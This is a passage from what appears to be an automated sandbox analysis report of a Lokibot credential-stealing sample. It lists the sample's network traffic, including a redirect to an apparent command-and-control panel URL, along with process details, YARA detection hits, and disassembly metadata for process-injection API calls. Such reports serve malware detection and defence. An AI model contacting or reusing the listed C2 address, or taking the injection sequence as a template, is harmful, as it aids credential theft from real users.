          Nov 20, 2021 21:37:07.026791096 CET | 1235 | IN | HTTP/1.0 301 Moved Permanently
          Location: http://www.publicspeaking.co.id/seun/Panel/five/fre.php
          Date: Sat, 20 Nov 2021 20:37:07 GMT
          Content-Type: text/html; charset=UTF-8
          Server: ghs
          Content-Length: 252
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 73 65 75 6e 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/seun/Panel/five/fre.php">here</A>.</BODY></HTML>


          Code Manipulations

          Statistics

          CPU Usage

          Memory Usage

          High Level Behavior Distribution

          Behavior

          System Behavior

          General

          Start time: 21:36:56
          Start date: 20/11/2021
          Path: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
          Wow64 process (32bit): false
          Commandline: "C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe"
          Imagebase: 0xd70000
          File size: 359690 bytes
          MD5 hash: 2AE5473D26A235B7AB3EE2D632514D60
          Has elevated privileges: true
          Has administrator privileges: true
          Programmed in: .Net C# or VB.NET
          Yara matches:
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation: low

          General

          Start time: 21:36:58
          Start date: 20/11/2021
          Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          Wow64 process (32bit): true
          Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          Imagebase: 0x400000
          File size: 1171592 bytes
          MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
          Has elevated privileges: true
          Has administrator privileges: true
          Programmed in: C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation: high

          Disassembly

          Code Analysis

            Executed Functions

            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID:
            • String ID: ?a_^$x\Fg
            • API String ID: 0-1648394570
            • Opcode ID: ec991fc5207a13d795de95636ceebcdab2d0c75b70932ba369f05d0d45ad07ca
            • Instruction ID: 6518cfbea6743ee2a6ac831910c73c71797febe8cae3a816649a16e79896f153
            • Opcode Fuzzy Hash: ec991fc5207a13d795de95636ceebcdab2d0c75b70932ba369f05d0d45ad07ca
            • Instruction Fuzzy Hash: 10122A62A0CB6E4BEB68A62C54591F977E1EFC6320F14427BD08DC71D3DD186C4BC2A9
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID: SectionUnmapView
            • String ID:
            • API String ID: 498011366-0
            • Opcode ID: 04515bdf9e4ddae536d4292cdf2a00cbf7d6f8ddd2819073419b702679ef0a4d
            • Instruction ID: 9af34ccfd08596bd43bad8178157962fd42a679a5748e04723cd8a449094e6c5
            • Opcode Fuzzy Hash: 04515bdf9e4ddae536d4292cdf2a00cbf7d6f8ddd2819073419b702679ef0a4d
            • Instruction Fuzzy Hash: A031093190CB5C4FDB29EB68984A6F97BE0EF56321F04427FD08ED3192DA746406C755
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 12954afe1db1c9b3f15cc875bd5bde4331a07b67e9ff0ea02c29aa8995014482
            • Instruction ID: 0379296c36b1ef52eb75dc3921c59fb31116c692e927b0506e455a5ef4214b48
            • Opcode Fuzzy Hash: 12954afe1db1c9b3f15cc875bd5bde4331a07b67e9ff0ea02c29aa8995014482
            • Instruction Fuzzy Hash: 4AB15A31A0875E8FEF9CDF288855AB977E1EF48305F04427AD44AD32E1DE24A846C756
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID: CreateProcess
            • String ID:
            • API String ID: 963392458-0
            • Opcode ID: 988fb8f58ee41a5a0a6b092314c0094d641ec98d57bd707385d23e5ea57ea5f4
            • Instruction ID: cde032c01bb0146c19d6b851ff42ae2060fb67335a41cabc2950ac7752efda36
            • Opcode Fuzzy Hash: 988fb8f58ee41a5a0a6b092314c0094d641ec98d57bd707385d23e5ea57ea5f4
            • Instruction Fuzzy Hash: 4DE1C330918B8D8FEB68DF28DC467E977E1FB59310F04422AD84DC7291DE74A946CB92
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID: MemoryProcessWrite
            • String ID:
            • API String ID: 3559483778-0
            • Opcode ID: 367c6bdffe8aeb4f2b1429531e32a76fba011c9cc4d2059eaeac76ae7e5d4d93
            • Instruction ID: 032415dd362ee4366a54c9a5af4dd0ae3d6c94d7375a57ff7ded115ed8807a30
            • Opcode Fuzzy Hash: 367c6bdffe8aeb4f2b1429531e32a76fba011c9cc4d2059eaeac76ae7e5d4d93
            • Instruction Fuzzy Hash: 1341E93190CB5D8FDB18DF5898456F97BE0EF99310F04826FD049D3282DA746849CB96
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID: ContextThreadWow64
            • String ID:
            • API String ID: 983334009-0
            • Opcode ID: d5dd901f182cc4d5f516434e112e97229d7061b5d7543458ac774230aeb3c023
            • Instruction ID: e998e1ba86183824a7df43c45d980672e6fe248795b259331d2fec6f581710f8
            • Opcode Fuzzy Hash: d5dd901f182cc4d5f516434e112e97229d7061b5d7543458ac774230aeb3c023
            • Instruction Fuzzy Hash: 2841173180CB994FDB2ADF6898456E97FE1EF56321F04426FD089C31D3DB64640AC7A5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID: MemoryProcessRead
            • String ID:
            • API String ID: 1726664587-0
            • Opcode ID: 88cc8b6b1ca6146747178b2a666450a29ac601ce1c599e19f6383d2e437ae130
            • Instruction ID: 85458f96ac712c7c321dbbb3230751d747cae86a4945e999c51501652a610e33
            • Opcode Fuzzy Hash: 88cc8b6b1ca6146747178b2a666450a29ac601ce1c599e19f6383d2e437ae130
            • Instruction Fuzzy Hash: 6E41B431D0CB5C8FEB18DF58984A6FD7BE1EB99321F00426FE449D3282DA746846C795
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: f97d3cb5d682fcff5f779f357fd93c1e7e4c5deaa2b1dce1aa5039c90daf69fd
            • Instruction ID: 957760ba341c8659d0c2c3d0f6457e37e463568e91785022ea77608fe4c337ed
            • Opcode Fuzzy Hash: f97d3cb5d682fcff5f779f357fd93c1e7e4c5deaa2b1dce1aa5039c90daf69fd
            • Instruction Fuzzy Hash: FB31F63191CB5C8FEB1CAB68980A6F97BE0EB55320F04436ED04AC3292DA646817CBD5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: c16b9281f2dce3fb9a33d095cc09366681b08285ecf9263286a6fc45f281e9d9
            • Instruction ID: e0149c1ed68394b00f80ad1f343b55d7e8d159e9590621d8de9ce87f3c19b69a
            • Opcode Fuzzy Hash: c16b9281f2dce3fb9a33d095cc09366681b08285ecf9263286a6fc45f281e9d9
            • Instruction Fuzzy Hash: 8531C23190CA5C8FEB59DF68984A7E97BE0EF95320F04826BD04DD3192DA755406CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 160455bdb1fa4f6ce4bf2eb4d1de016e46d5ae52d2f7751a98c776db07197a8b
            • Instruction ID: d3351adcbe8b76d0a0b79bfd3a4c1927c6baee9a45a5bb1c4560c29f0212761a
            • Opcode Fuzzy Hash: 160455bdb1fa4f6ce4bf2eb4d1de016e46d5ae52d2f7751a98c776db07197a8b
            • Instruction Fuzzy Hash: 75B1956790D7E75BEB1AA62C9C9A0E53FA0DF5323471841B3C089CE1D3E919184FC67A
            Uniqueness

            Uniqueness Score: -1.00%